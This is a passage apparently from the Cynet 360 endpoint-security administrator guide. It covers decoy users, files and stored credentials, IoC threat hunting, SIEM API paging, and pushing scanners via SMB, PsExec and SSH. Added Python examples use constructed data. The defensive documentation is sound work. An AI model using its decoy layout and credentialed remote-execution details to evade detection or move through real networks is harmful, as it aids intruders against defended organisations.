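CHARACTER_GROUPS = {
    "lower case letters": set(string.ascii_lowercase),
    "upper case letters": set(string.ascii_uppercase),
    "numbers": set(string.digits),
    "symbols": set("!@#$%^&*"),
}
MIN_LENGTH, MAX_LENGTH = 8, 20
REQUIRED_GROUPS = 3


def check_password(password: str):
    """Return (ok, reasons). `reasons` lists every rule the password fails so a
    User can fix all of them in one attempt."""
    reasons = []
    if not MIN_LENGTH <= len(password) <= MAX_LENGTH:
        reasons.append(
            f"length must be {MIN_LENGTH} to {MAX_LENGTH} characters (got {len(password)})"
        )
    present = [
        name for name, chars in CHARACTER_GROUPS.items()
        if any(c in chars for c in password)
    ]
    if len(present) < REQUIRED_GROUPS:
        missing = [name for name in CHARACTER_GROUPS if name not in present]
        reasons.append(
            f"only {len(present)} of 4 character groups present; "
            f"add at least one of: {', '.join(missing)}"
        )
    return (not reasons, reasons)


if __name__ == "__main__":
    # Constructed sample passwords, not real credentials.
    for candidate in ("Passw0rd", "password", "Ab1", "a" * 21, "Tr0ub4dor&3"):
        ok, reasons = check_password(candidate)
        print(f"{candidate!r}: {'ok' if ok else '; '.join(reasons)}")
```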

Changing a User’s Password

All Users can change their own passwords.

To change an account’s password, in the Manage Users tab:

Click Change Password.

Note

Passwords for Dashboard level Users can be changed by Operators. Operator-level account passwords cannot be changed by other Operators.

Enter your current password.

Enter your new password.

Enter your new password to confirm.

Click Change.

If the new password does not meet the complexity requirements, you are prompted to re-enter a new password.

When Operators change another account’s password, the system prompts them to enter the new password twice. If the new password does not meet the complexity requirements, they must enter a new password.

Deleting a User

To delete a User from the Cynet console, click Delete User.

Note

The default Operator account cannot be deleted.

Deception

Cynet 360 deploys deception entities (honeypots) in your network to lure attackers. When these entities are used, Cynet 360 detects them and raises an alert on the illicit activity.

Each Deception alert contains details about which type of deception was triggered, the attacker IP address, the Victim IP address, hostname, and File name, if applicable.

The types of deceptions are:

Deception Users

Decoy Users and host names

Deception Files

Decoy files

Deception Network

Decoy hosts and endpoints on the network

To enable these deceptions:

Activate the deception types.

Configure the deception types.

Deception Users

Activating Deception Users

To activate deception Users and files:

On the main menu, click .

In the Scan Groups tab, navigate to Deception Users.

Click Enable Deception Users.

Configuring Deception Users

To configure deception Users:

On the main menu, click .

Click Deceptions.

Click the Users tab.

To create a new deception User:

Click Create.

Select the Scan Group.

Enter a User Name.

Enter a Host Name.

Enter a User Type.

Click Add.

To edit an existing Deception User, click Edit and change the required settings.

To remove an existing Deception User, click Remove.

Deception Files

Cynet 360 supports different types of decoy files.

Decoy Type – Description
Office Documents – Cynet deploys Excel, Word, and PowerPoint documents to the host in a newly-created User directory. These files contain beacons. When they are opened, they communicate with the Cynet server and generate an alert. Cynet enables Users to create their own decoys.
Remote Desktop Files – Cynet deploys Remote Desktop (RDP) files with saved imitation credentials on the host. When this file is executed, it attempts to connect to the Cynet server with invalid credentials and generates an alert.
ODBC – Cynet configures an ODBC connection on the host, which points to the Cynet server. When this connection is used, it generates an error and an alert.
NetBIOS – Cynet can configure network shares on the host, which are monitored. When the session is used, it generates an alert.
Stored Credentials – Cynet implants invalid credential information in the Windows Credential Manager. If these credentials are obtained by an attacker and used for authentication elsewhere in the environment, an alert is generated.
Text Files – Cynet deploys text files to the host with invalid credentials. These credentials disguise themselves as domain credentials or credentials to an internal Web application. If either of these invalid credentials is used, an alert is generated.

Deception Office Documents

Cynet creates a new User folder such as C:\Users\admin_c493d82, with a randomly-generated account name.

Within this directory, there will be several deception Office documents such as Word (.docx), Excel (.xlsx), and PowerPoint (.pptx) files. These files have attractive filenames to lure attackers and are placed throughout the new User directory.

When one of these files is opened with Microsoft Office, the beacon within the document attempts to communicate with the Cynet server as well as the Cynet-controlled Web domain ad-stats.com. This ensures that the Cynet SOC can identify when deception files are opened outside the corporate LAN environment.

Deception RDP Files

Cynet creates a saved RDP connection file in the same directory as described above. The RDP connection file contains invalid credentials. The file attempts an RDP connection to the Cynet server on port TCP 8484 and fails. When the RDP attempt is made, an alert is generated in the Cynet console.

Deception ODBC Connection

ODBC (Open Database Connectivity) is an open standard API for accessing databases. ODBC statements are used to connect to various databases such as Access, dBase, DB2, and Excel. Cynet uses the Windows built-in programming support for ODBC by planting an ODBC connection to a non-existent database in the environment. When an attacker attempts to use this ODBC connection to connect to the invalid database, an alert is generated in the Cynet console.

Cynet implants the ODBC connection by deploying various registry keys to the Windows host. The implanted ODBC can also be found in Control Panel > System & Security > Administrative Tools > Data Sources (ODBC).

The implanted connection is listed as a SQL Server data source on the System DSN tab.

Deception Text Files

Cynet can deploy text files with invalid domain credentials within a newly created User directory. Cynet can also deploy text files with credentials for a non-existent internal application. If the domain credentials are used for authentication or if the URL is accessed, an alert is generated in the Cynet console.

Deception Stored Credentials

The Windows Credential Manager is the “digital locker” where Windows stores login credentials on the network. This data can be accessed by Windows or other applications that use the stored credentials. There are three main types of stored credentials in the Credential Manager:

Windows Credentials

Only used by Windows and its services. For example, saved credentials for a network shared folder.

Certificate-based Credentials

Used together with smart card authentication. This is usually configured in higher security networks with Active Directory configured for smart card authentication.

Generic Credentials

General saved credentials that are defined by applications used on the computer, for example, Office365 or Windows Live.

Credentials saved in the Credential Manager are commonly targeted by threat actors. Cynet 360 implants invalid Username and password credentials in the Credentials Manager. When a threat actor uses these credentials to authenticate in the environment, an alert is generated.

Activating Deception Files

To activate deception Users and files:

On the main menu, click .

In the Scan Groups tab, navigate to Deception Files.

Click Enable Deception Files.

Configuring Deception Files

To configure deception Files:

On the main menu, click .

Click Deceptions.

Click the Files tab.

From here you can:

Add a new decoy file

Edit existing decoy files

Enable decoy files in groups

Decoy Files Listener Port

This is the listener port that decoy files use when beaconing back to the Cynet server. The protocol used is TCP.

Enabling Decoy Files in a Group

To enable a Decoy File in a Group:

Click the file name or .

Click .

Select an option to deploy.

Adding a New Decoy File

Users can create a new Decoy File from an existing Office file.

To Add a New Decoy File:

From Settings>Deception tab, click Add New Decoy File.

Select a file to use as the Decoy.

Click Generate Test File.

A test Decoy File is downloaded to the destination of your choice.

Enter a file name.

Select a group.

Select file deployment locations.

When this file is accessed, Cynet generates an alert.

Deception Network

Cynet 360 deploys deception entities (honeypots) in your network to lure attackers. When these entities are used, Cynet 360 detects them and generates an alert on the illicit activity.

To enable this feature:

Activate the Deception Network.

Configure the Deception Network.

Activating the Deception Network

To activate the Deception Network:

On the main menu, click .

Click the Scan Groups tab and navigate to Deception Network.

Click Enable, then Save.

Configuring the Deception Network

To configure the Deception Network:

On the main menu, click .

Click the Deception tab.

Click the Network tab.

In the Max Decoy Hosts Per Endpoint field, enter the maximum number of hosts for each endpoint. The default is 10.

In the Select Group field, enter the scan group to configure.

Add a single or multiple decoy.

To manually add a single decoy, click Add.

To import multiple decoys from a CSV file, click Import.

To see how the CSV file must be set up, click Download CSV Example.


Note

You can add and import as many decoys as you want, but only the maximum number is distributed on your network. The decoys to be uploaded are selected by Cynet 360 at random.

To delete a decoy, select it from the list and click Delete Selected Decoys.

To delete all decoys, click Delete All Decoys.

IMPORTANT!

Any change to the list of decoys (adding, importing, or deleting) causes Cynet 360 to automatically select new decoys.


When a file is accessed, Cynet triggers an alert.

Scanning On-Demand (Threat Hunting)

Cynet enables Operators to scan endpoints for threats. Operators can scan for threats on-demand, based on their awareness of Indicators of Compromise (IoCs).

To scan on demand:

Define the IoCs (file SHA256, file MD5, file name, full file path), and the extensions and folders to search.

Define the severity of the potential alert if a threat is found.

Cynet scans the endpoints. If a file that matches the IoC is found, an alert is generated.

Enabling Threat Hunting

To enable Threat Hunting:

On the Cynet Dashboard, navigate to Settings.

Click Scan Groups.

In the Threat Hunting section, select Enable Threat Hunting.

Enter a period of time (in minutes) for Cynet to check if there is a new search to perform.

To disable threat hunting, deselect Enable Threat Hunting.

Configuring Threat Hunting Settings

Operators can configure Threat Hunting settings based on their awareness of IoCs.

To configure Threat Hunting settings navigate to Settings > Threat Hunting.

Creating a List of IoCs to Search

From the Indication Type drop-down menu, select the Indication Type you want to search.

For each Alert Type, enter a Value and a Description of the Alert.

To add the new search indicator to the list, click .

The new search indicator appears in the list.

Note

Cynet generates an alert for any of the IoCs it finds. It is not necessary to find all of the IoCs simultaneously to generate an alert.

In the Filter By Extension section, insert a file extension to scan.

Click .

The file extension is added to the list.

To add more file extensions, repeat Steps 4 and 5 above.

In the Filter By Directory section, insert a Directory to scan.

Click .

The Directory is added to the list.

To add more Directories, repeat Steps 6 and 7 above.

From the Alert Severity drop-down menu, select the severity of the alert.

You can select a Severity level from Informative, Low, Medium, High, and Critical.

To stop a running scan and start a new scan, in the Suppressed Mode section, select Suppress. To wait for the current scan to stop, leave this checkbox cleared.

To save the changes you made, click Save Changes.

Threat Hunting starts on all endpoints.

To stop a current scan, click Stop Current.

To restart the current scan, click Restart Current.

All endpoints are scanned. If they were scanned previously, they will be rescanned.

To delete all the IoCs, click Clear Search Criteria.
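The hunt configured above combines four indication types (SHA256, MD5, file name, full path) with extension and directory filters and a single severity, and any one match is enough to alert. The Python below is an added example, not Cynet code, that runs the same logic against a constructed directory tree so the effect of the filters is visible: scoped to .exe/.dll under the Users directory, only one of four planted indicators fires; without filters, all four do. File contents, paths and indicator descriptions are constructed; no real malware is involved.

```python
import hashlib
import os
import tempfile
from dataclasses import dataclass


@dataclass(frozen=True)
class Ioc:
    kind: str          # "sha256", "md5", "name" or "path" (the guide's indication types)
    value: str
    description: str


def file_hashes(path):
    """SHA256 and MD5 of a file, read in chunks so large files are not loaded whole."""
    sha256, md5 = hashlib.sha256(), hashlib.md5()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            sha256.update(chunk)
            md5.update(chunk)
    return sha256.hexdigest(), md5.hexdigest()


def _norm_path(p):
    # Case-fold on Windows, keep case elsewhere; absolute so relative IoCs still match.
    return os.path.normcase(os.path.abspath(p))


def hunt(directories, iocs, extensions=None, severity="High"):
    """Walk `directories`, keep only `extensions` when given, and raise one alert
    per matching IoC. A single match alerts; all IoCs need not be present."""
    ext_filter = {e.lower().lstrip(".") for e in extensions} if extensions else None
    wanted = {"sha256": {}, "md5": {}, "name": {}, "path": {}}
    for ioc in iocs:
        key = _norm_path(ioc.value) if ioc.kind == "path" else ioc.value.lower()
        wanted[ioc.kind][key] = ioc
    need_hashes = bool(wanted["sha256"] or wanted["md5"])

    alerts = []
    for directory in directories:
        for root, _dirs, files in os.walk(directory):
            for name in files:
                path = os.path.join(root, name)
                ext = name.rsplit(".", 1)[1].lower() if "." in name else ""
                if ext_filter is not None and ext not in ext_filter:
                    continue
                matches = []
                if name.lower() in wanted["name"]:
                    matches.append(wanted["name"][name.lower()])
                if _norm_path(path) in wanted["path"]:
                    matches.append(wanted["path"][_norm_path(path)])
                if need_hashes:  # hash only when a hash IoC exists: hashing is the slow part
                    sha, md5 = file_hashes(path)
                    for kind, digest in (("sha256", sha), ("md5", md5)):
                        if digest in wanted[kind]:
                            matches.append(wanted[kind][digest])
                for ioc in matches:
                    alerts.append({"path": path, "indicator": ioc.kind, "value": ioc.value,
                                   "description": ioc.description, "severity": severity})
    return alerts


def build_sample_tree():
    """Constructed endpoint layout with constructed file contents."""
    root = tempfile.mkdtemp(prefix="hunt_demo_")
    layout = {
        ("Users", "public", "tmp", "invoice.exe"): b"constructed sample payload A",
        ("Users", "public", "tmp", "notes.txt"): b"constructed notes",
        ("Windows", "logs", "setup.dll"): b"constructed sample payload B",
        ("Windows", "logs", "helper.exe"): b"constructed helper",
    }
    for parts, data in layout.items():
        path = os.path.join(root, *parts)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)
    return root


def sample_iocs(root):
    """One indicator of each type, all constructed for this example."""
    return [
        Ioc("sha256", hashlib.sha256(b"constructed sample payload A").hexdigest(), "dropper hash"),
        Ioc("md5", hashlib.md5(b"constructed sample payload B").hexdigest(), "loader DLL hash"),
        Ioc("name", "helper.exe", "known tool file name"),
        Ioc("path", os.path.join(root, "Users", "public", "tmp", "notes.txt"), "staging path"),
    ]


def demo():
    """Return (scoped alerts, unscoped alerts) for the constructed tree."""
    root = build_sample_tree()
    iocs = sample_iocs(root)
    scoped = hunt([os.path.join(root, "Users")], iocs, extensions=("exe", "dll"), severity="Critical")
    everything = hunt([root], iocs)
    return scoped, everything


if __name__ == "__main__":
    scoped, everything = demo()
    print(len(scoped), "alert(s) with filters;", len(everything), "without")
```

The filters are a scoping decision, not a detection one: narrowing by extension or directory makes the scan cheaper but also silently excludes a path or name indicator that lives elsewhere, which is why the unscoped run is worth comparing before trusting a clean result.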

Threat Hunting Results

When Cynet finds a threat based on the defined IoCs, it generates an alert and sends an email.

The alert appears in the Alerts page.

To see details of the Alert, click .

Using the Cynet SIEM API

The Cynet Security Information and Event Management (SIEM) API is a new API that enables SIEM systems to extract information from Cynet.

Sockets

Domain occurrences

File occurrences

User login

Vulnerability Assessment (NEW!)

Cynet APIs are documented in the product at https://localhost:6443/help.

Relevant API entries:

Sockets

api/network/sockets?FromDate={FromDate}&ToDate={ToDate}&Offset={Offset}&Limit={Limit}

Domains

api/network/domains?FromDate={FromDate}&ToDate={ToDate}&Offset={Offset}&Limit={Limit}

File Occurrences

api/file/occurences?FromDate={FromDate}&ToDate={ToDate}&Offset={Offset}&Limit={Limit}

User

api/User/loggedIn?FromDate={FromDate}&ToDate={ToDate}&Offset={Offset}&Limit={Limit}

Vulnerability Assessment

Missing Windows patches – api/va/patches/missing

Existing Windows patches – api/va/patches/existing

Unauthorized Applications – api/va/riskyApps

Installed software – api/va/installedSoftwares

Applications patch – api/va/patchValidation

Installed agents – api/va/Agents

Notes:

Currently, there is no documentation for the fields of the internal objects (LoggedInUserSummaryDTO, SocketSummaryDTO, and FileOccurrenceModel).

The filter according to FromDate and ToDate is calculated as follows:

FromDate <= last-seen < ToDate

Defaults

Offset – 0

Limit – 500

FromDate – no filter

ToDate – no filter
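A SIEM collector for these endpoints has to page with Offset and Limit (default 500) and respect the half-open FromDate/ToDate window. The Python below is an added example, not Cynet code: it builds the documented query strings, pages through a collection until a short page arrives, and applies the same FromDate <= last-seen < ToDate rule client-side. The base URL comes from the guide's in-product documentation address; the date format (ISO 8601), the authentication header the deployment requires, and the record field names in the fake server are assumptions, since the guide states the object fields are undocumented.

```python
import json
import urllib.parse
import urllib.request

# Base URL taken from the guide's in-product documentation address; adjust per deployment.
BASE_URL = "https://localhost:6443"

# Endpoints as listed in the guide (the 'occurences' spelling is the API's own).
ENDPOINTS = {
    "sockets": "api/network/sockets",
    "domains": "api/network/domains",
    "file_occurrences": "api/file/occurences",
    "user_logins": "api/User/loggedIn",
}
DEFAULT_LIMIT = 500  # the guide's default Limit; Offset defaults to 0


def build_url(kind, from_date=None, to_date=None, offset=0, limit=DEFAULT_LIMIT, base=BASE_URL):
    """Assemble one request URL. Dates are passed through as given; the format the
    server expects is not stated in the guide (ISO 8601 is assumed here)."""
    params = {"Offset": offset, "Limit": limit}
    if from_date is not None:
        params["FromDate"] = from_date
    if to_date is not None:
        params["ToDate"] = to_date
    return f"{base.rstrip('/')}/{ENDPOINTS[kind]}?{urllib.parse.urlencode(params)}"


def in_window(last_seen, from_date, to_date):
    """The filter the guide documents: FromDate <= last-seen < ToDate, with a
    missing bound meaning no filter on that side."""
    if from_date is not None and last_seen < from_date:
        return False
    if to_date is not None and last_seen >= to_date:
        return False
    return True


def iterate_records(fetch, kind, from_date=None, to_date=None, limit=DEFAULT_LIMIT, base=BASE_URL):
    """Page through a collection with Offset/Limit until a short page arrives.
    `fetch(url) -> list` is injected so the paging logic runs offline against a
    fake server; `http_fetch` below is the real transport."""
    offset = 0
    while True:
        page = fetch(build_url(kind, from_date, to_date, offset, limit, base))
        yield from page
        if len(page) < limit:
            return
        offset += limit


def http_fetch(url, headers=None, timeout=30):
    """HTTPS GET returning the decoded JSON body. Authentication is not covered in
    this section of the guide: pass whatever header your deployment requires."""
    req = urllib.request.Request(url, headers=headers or {})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return json.load(resp)


class FakeSiemServer:
    """Constructed stand-in for the API to exercise paging and windowing offline.
    Records carry a synthetic 'lastSeen' field; real field names are undocumented."""

    def __init__(self, count):
        self.records = [
            {"id": i, "lastSeen": f"2020-05-01T{i // 60:02d}:{i % 60:02d}:00"} for i in range(count)
        ]
        self.calls = 0

    def __call__(self, url):
        self.calls += 1
        q = urllib.parse.parse_qs(urllib.parse.urlsplit(url).query)
        offset, limit = int(q["Offset"][0]), int(q["Limit"][0])
        from_date, to_date = q.get("FromDate", [None])[0], q.get("ToDate", [None])[0]
        selected = [r for r in self.records if in_window(r["lastSeen"], from_date, to_date)]
        return selected[offset:offset + limit]


if __name__ == "__main__":
    server = FakeSiemServer(1200)
    total = sum(1 for _ in iterate_records(server, "sockets"))
    print(f"{total} records in {server.calls} requests")
```

Keep the window half-open in the collector's own bookkeeping as well: if the next poll starts at the previous ToDate, a record seen exactly at that instant is fetched once and only once, which is the property the guide's filter definition gives you.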

Setting Up Cynet

You can configure Cynet 360 to meet your organizational needs according to the requirements of your operating environment.

Settings

The Settings Page provides extensive system management and configuration capabilities for the Cynet 360 platform. The page has the following tabs:

Scan Groups

You can define a population of hosts to scan by configuring settings in the following main Scan Group sections:

Scan Settings

Scan Population

Scan Schedule Settings

Configuration

You can configure system settings including:

Analytics Server Configurations

Exclusion Settings

Network Traffic Analysis Settings

Log Parser Settings

VPN Log Parser Settings

Import User Data Settings

Import User Data from CSV File

User SMS Confirmation Settings

EPS Configuration

You can define custom memory analysis methods for the EPS.

Note

Cynet recommends that you contact your Cynet Technical Support representative before creating a memory analysis method.

Deception

You can create new or edit existing deception files and configure or update Network settings for the deception files.

Advanced

You can configure settings for advanced scanning, including:

Connection Settings

Privacy & Compliance Settings

Master & Slave Server Settings

Policy Exclusion Settings

Throttle Settings

Domain Whitelisting Settings

Remediation Settings

Decoy Settings

Console Settings

File Monitoring

Windows Event Settings

Note

The terms Decoy and Deception are interchangeable.

Users

You can configure settings for User accounts accessing the Cynet system. These include:

Authentication Settings

Add/Edit/Delete Users

Change Passwords

Active Directory Authentication Settings

Maps

You can configure IP ranges for your Cynet environments on a map.

Analysis

You can configure settings for analysis actions of the system.

Dynamic Analysis Settings

Deep Scan Settings

Alerts

You can configure settings for alerts generated. These include:

Email Settings

General Settings

Alert Settings

Unscanned Host Alert Settings

Email Alert Filter Settings

Integrations

You can specify Active Directory domains for User authentication.

Vulnerability Management

You can configure settings for the following cases:

Windows Patch Validation

Unauthorized Applications

Application Patch Validation

Agents Validation

User Behavior Analytics (UBA) Management

You can edit event triggers used to monitor User behavior.

Threat Hunting

You can configure settings for searches involving specific file information.

Whitelisting

You can configure settings to create whitelisted profiles and automatically exclude certain alert types.

Remediation

You can configure settings for Custom Remediation actions and Playbooks.

Cynet recommends that you contact your Cynet Support Technician before setting up custom remediation actions.

Windows Events

You can edit existing Windows Events configurations, or create new configurations defining which Windows events to monitor for the selected scan group.

System Info

You can view information regarding the Cynet system in two sections:

Main Info

System Health

Setting Up Cynet to Detect Threats

The first part of Cynet’s breach protection strategy is detecting threats. Cynet initiates threat detection using the following methods:

Setting Up Scan Groups

Operators can use the Scan Groups page to configure endpoint scanning. You can configure groups based on the endpoint type, IP subnet, or scanner mode. You can use a “default group” or you can create a new scan group.

To create a new Scan Group:

Click Create.

Enter Group Name and Group Description (these are optional).

Click Save to create the new group.

To edit the Group Information section, select the appropriate Scan Group from the drop-down menu.

To Remove a Scan Group:

Select the correct group for deletion from the drop-down menu.

Click Remove.

Scan Group Settings

You can use scan groups to separate scan settings between subnets, computer types, and departments. All scan settings are saved to the group and are specific to that group. Scan groups can contain separate credentials for scanning, scan scheduling, and distribution types.

Setting Up the Distribution Type

The Distribution Type setting enables the system to push the Cynet endpoint scanner (CynetEPS) to the endpoints.

Distribution Types include:

Auto

The Auto Distribution Type cycles through all the Distribution Types. If one Distribution Type fails, the system proceeds to the next type and attempts to scan the host. Cynet uses this setting in the following order:

Launcher

Scheduled Tasks

Remote Procedure Calls (RPC)

SSH

Launcher

The Cynet Launcher Distribution Type authenticates to the endpoints using the configured account credentials via CynetLauncher.exe. It transmits the CynetEPS via SMB to be executed.

To enable this Distribution Type, ensure that port 445 is open at the endpoint.

Scheduled Tasks

The Cynet server authenticates to the endpoints using the configured account credentials via MSRPC and transmits a task message to the endpoints to execute the CynetEPS.

To enable this Distribution Type, ensure that TCP port 135 is open at the endpoint.

SSH

The Cynet server authenticates to the endpoints using the configured account credentials via SSH. It transmits the CynetEPS and runs the daemon.

To enable this Distribution Type, ensure that TCP port 22 is open at the endpoint.

RPC

The Cynet server authenticates to the endpoints using the configured account credentials via PsExec and transmits the CynetEPS via SMB to be executed.

To enable this Distribution Type, ensure that TCP port 445 is open at the endpoint.

Manually Installed Agent

In this case the Cynet server does not distribute the EPS to the hosts. The installation is performed using a third-party system such as WSUS, SCCM, or BigFix.

To see Distribution Type settings, on the Scanner page, click Manual Scans.

Scan Group Information Settings

The Scan Account is the account used to authenticate to hosts when scanned. You can save multiple sets of credentials to be used on any scan group. Cynet hashes and encrypts all saved credentials in the Cynet database.

Note

Separate credentials are necessary for Windows, Linux, and MAC hosts. Hosts of each OS type must be placed in a separate scan group, with separate credentials for each scan group.

Selecting the Scanning Platform

You can select the relevant operating system from the drop-down menu.

All settings are adjusted based on this selection.

Note

You can only include one Operating System in a group.

To create a new scan account:

Select a Distribution Type (other than Manually Installed Agent) from the drop-down menu.

Click Create.

Enter an alias for this set of credentials.

The Service option uses the current credentials running on the server.

To use the Credentials option, enter a Username, password, and the domain (if an Active Directory account).

Note

If the credentials entered are a local Windows account or a local Linux account, you do not need to specify a domain.

To confirm that the credentials you entered are valid, click Validate Credentials. If the credentials validate successfully, a displays. If the validation fails, a displays.

Note

“Validate Credentials” only works for Active Directory credentials. Local Windows accounts or local Linux accounts do not validate.

To save the credentials, click Save.

Creating Manually Installed Agents Groups

To create a group that contains a manually-installed agent:

Create a new Scan Group. See “Setting Up Scan Groups”.

In the Distribution Type section, select Manually Installed Agent.

Click Save.

This group now contains only agents that are manually installed.

Adding an Agent to a Manually-Installed Group

For specific details on how to work with Manually-Installed Agents, go to:

https://cynethelp.zendesk.com/hc/en-us/articles/360010559033-Cynet-360-Light-Agent-Manual-Installed-Agents-Windows-Linux-MAC

To pre-configure a host in the scan group population, go to:

https://cynethelp.zendesk.com/hc/en-us/articles/360015098014-Cynet-360-Configuration-Recommendations-First-Installation

To add a Manually-Installed Agent to a group:

Add the agent to the group population.

Use one of the suggested methods:

Host name

IP range

OU

Install the Agent using MSI.

The Agent is automatically associated to the group in which it was defined.

This feature supports Linux OS, providing the Distribution Platform parameter is set to Linux.

Changing a Group

You can delete a Host from one scan group and add it to another scan group.

You can also Export and Import the Host population.

Adding Agents to Groups Using CLI

To add a Manually-Installed Agent to a group as defined above, the “-group” argument is added to the EPS.

For more details on how to do this, go to:

https://cynethelp.zendesk.com/hc/en-us/articles/360010559033-Cynet-360-Light-Agent-Manual-Installed-Agents-Windows-Linux-MAC

and

https://cynethelp.zendesk.com/hc/en-us/articles/360006766914-Use-logon-script-to-install-Cynet-MSI

The new argument points to the name of the group to which the EPS belongs.

To use this parameter:

Add “-group” to the MSI command line arguments.

Insert the target group name.

When using the MSI installation method, the Cynet MSI might have additional command line parameters for the group name. If the group name exists, it assigns the host to the relevant group. Otherwise it assigns the host to the default MSI group.

Changing Group

To move an agent from one group to another group, uninstall the MSI.

Reinstall the MSI with the new group name as the argument.

Setting the Scan Mode

This setting enables the system to configure the Cynet endpoint scanner (CynetEPS) to run on hosts.

The methods include:

Interval

The CynetEPS deploys to the configured endpoints at the specified scan interval. The CynetEPS self-terminates on the endpoints at the end of the scan cycle.

Always On

The CynetEPS deploys to the configured endpoints immediately. The CynetEPS continues to run after the initial scan completes. This ensures that any new change or activity on the endpoints is collected and sent back to the Cynet server for analysis in real-time.

Light Agent

The CynetEPS deploys to the configured endpoints immediately. The CynetEPS continues to run after the initial scan completes and a service is created so that the CynetEPS starts when the endpoints reboot.

Scan Mode settings are marked on the Scanner pages in the Status column. Hosts scanned in the Interval mode show the scan progress. Hosts scanned in the Always On and Light Agent modes display their current status.

Available scan modes are dependent on the selected Distribution Type.

Setting Up the Active Directory Domain

You can specify the Active Directory domain to scan.

In the Active Directory section, enter the domain name and click Save.

Setting the CPU Average Consumption

This setting enables you to configure the maximum CPU usage CynetEPS uses when running on endpoints in this scan group.

In the CPU Average Consumption section, select an option from the drop-down menu.

Notes

15% is the recommended option.

If you select 5%, not all alert information is collected, and that information is not retrievable later.

Scan Interval

Scan Interval shows the time interval during which endpoints in this scan group are scanned. This time interval is set to 60 minutes.

Additional Settings

The following settings are rarely used. Some of them can only be configured by a Cynet Technical Support Specialist.

Some of the following settings are dependent on the distribution type or scan mode being used:

Network Attack Detection

Use this setting in Light Agent and Always On modes. It configures the CynetEPS to detect network-based attacks being performed on the host. The CynetEPS binds itself to the endpoint NIC to see all network traffic being performed on the host.

Internet Availability Check

You can configure the CynetEPS to check the endpoints for Internet connectivity. Some threat indicators are weighted differently depending on whether the endpoint can connect directly to the Internet.

Memory Injection Remediation

You can configure the CynetEPS to automatically kill any process that performs a memory injection or an illegal usage of memory on a scanned host. It is most useful for immediate Ransomware mitigation.

Unscanned Group Alert

This setting generates an alert if most of the scan population of this group is not being scanned.

Advanced Detection Technology (ADT)

This setting turns on the Advanced Detection Technology (ADT) heuristic engine. The ADT engine enables the Cynet EPS to detect threats using behavioral analysis.

ADT—Behavioral Heuristic Remediation

This setting enables the behavioral heuristic remediation capabilities of the ADT.

ADT—Ransomware Heuristic Detection

This setting enables ransomware detection capabilities of the ADT engine in the Cynet EPS. It appears only in Always On and Light Agent modes. It is only available if you enable ADT.

ADT—Ransomware Heuristic Remediation

This setting enables the ransomware remediation capabilities of the ADT engine. It appears only when Ransomware Heuristic Detection is enabled. When Ransomware is detected using the ADT engine, it is automatically stopped.

ADT—Ransomware Heuristic Decoy Files

This setting enables ransomware detection through the use of hidden decoy files created on scanned endpoints. It appears only when Ransomware Heuristic Detection is enabled. These decoy files are different from the files described in “Deception Files”. These specific files are designed to detect modifications by ransomware.

ADT—Ransomware Heuristic Decoy Disk Space Limit

This setting limits the amount of disk space the Ransomware Heuristic Decoys can consume on an endpoint (in MB). It appears only when Ransomware Heuristic Decoys is enabled.

File Monitoring

You can monitor the following file events:

Create new

Access

Delete

Delete for rename

Renamed file

ADT—Fuzzy Hashing Detection

This setting enables the Cynet EPS to employ fuzzy hashing techniques to detect malware. The technique involves mathematically calculating similarities between files. The detection method enables the system to detect previously-unknown variants of malware through similar or shared code.

ADT—Fuzzy Hashing Remediation

This setting enables the remediation capabilities of the Fuzzy Hashing Detection mechanism. It appears only when Fuzzy Hashing Detection is enabled. When malware is detected using this method, it is automatically stopped.

Disable String Collection

This setting disables memory string collection by the EPS for all hosts in this scan group.

Memory Protection Mode

This setting enables the EPS to run at the kernel level. While in Memory Protection Mode, the EPS gains visibility into kernel-level threats and enables an anti-tampering mechanism that prevents the EPS process from being terminated on the host.

Raw Disk Writing Prevention

This setting enables the EPS to prevent raw disk writing, such as writing to the MBR. It is available only when Memory Protection Mode is enabled.

Raw Disk Writing Process Termination

This setting enables the EPS to automatically terminate a process that attempts to perform a raw disk write. It appears only when Raw Disk Writing Prevention is enabled.

Memory Injection Prevention

This setting enables the EPS to pre-emptively terminate a process performing a memory injection at the kernel level. It appears only when Memory Protection Mode is enabled.

Local Alert Messages

This setting enables the EPS to display an alert on the host when a threat is detected.

Fast Scan Detection

This setting enables the EPS to send scan data from hosts to the Cynet server immediately for analysis. In normal operation, the EPS sends this data in increments to reduce network traffic congestion.

Fast Scan Remediation

This setting enables the EPS to automatically terminate any process that is detected as a threat using the fast scan detection method.

Windows Patch Validation

This setting enables the Windows Patch Validation function, as part of the Vulnerability Management feature. It enables monitoring and alerts when missing operating system patches are identified.

Unauthorized Applications

This setting enables the unauthorized applications validation function as part of the Vulnerability Management feature. It enables monitoring and alerts when unauthorized applications are identified.

Application Patch Validation

This setting enables the Application Patch Validation function as part of the Vulnerability Management feature. It enables monitoring and alerts when installed applications do not comply with the minimum configured version.

Agents Validation

This setting enables the Agents Validation function as part of the Vulnerability Management feature. It enables monitoring and alerts when a key application is not installed or is not running.

Vulnerability Assessment (VA) Indicator Period

Sets the time interval (in minutes) to search for new Vulnerability Assessment indicators.

Threat Hunting

When enabled, this setting supports searching on client endpoints by: SHA256, MD5, File Name, and Full File path.

Antivirus

When enabled, this setting detects malicious files on file execution events.

Antivirus Engines

You can select which Antivirus Engine is active on the endpoint’s scanner.

Antivirus Options

You can set Antivirus remediation options and enable antivirus file creation tracking.

Windows Events Monitoring

Enables Windows Event Monitoring.

Encryption Token

This setting is used to create a random encryption token to encrypt the password used for the Scan Account in this group. This ensures that the encrypted password token is unknown and stored passwords cannot be decrypted.

To ensure all configuration changes are saved, click Save.

Configuring Scan Population Settings

There are three ways to add endpoints to a scan group:

Individually via the hostname or IP address

IP address ranges

Active Directory by Organizational Units (OUs) or Security Groups (SGs)

Using the Host name or IP Address

You can add new endpoints to the scan group population by entering either an individual hostname such as “host1344”, or an IP address, such as 192.168.220.101.

To add the endpoint:

Click Endpoints.

Enter the Host Name or IP address.

Click Add.

Note

When entering a hostname, ensure that the Cynet server can resolve the hostname to an IP address to connect and scan the host.

You can import a Host name from a file.

To open the Import Hosts window, click Import.

Select a file to upload.

Click Upload CSV File.

A confirmation message opens.

An example CSV file is shown below:

The list in the CSV file is imported to the Population List:

Note

When uploading the file make sure that the CSV file contains only the Hostname. Also, the whole list must be in one column with no empty spaces or Headings.

Using IP Ranges

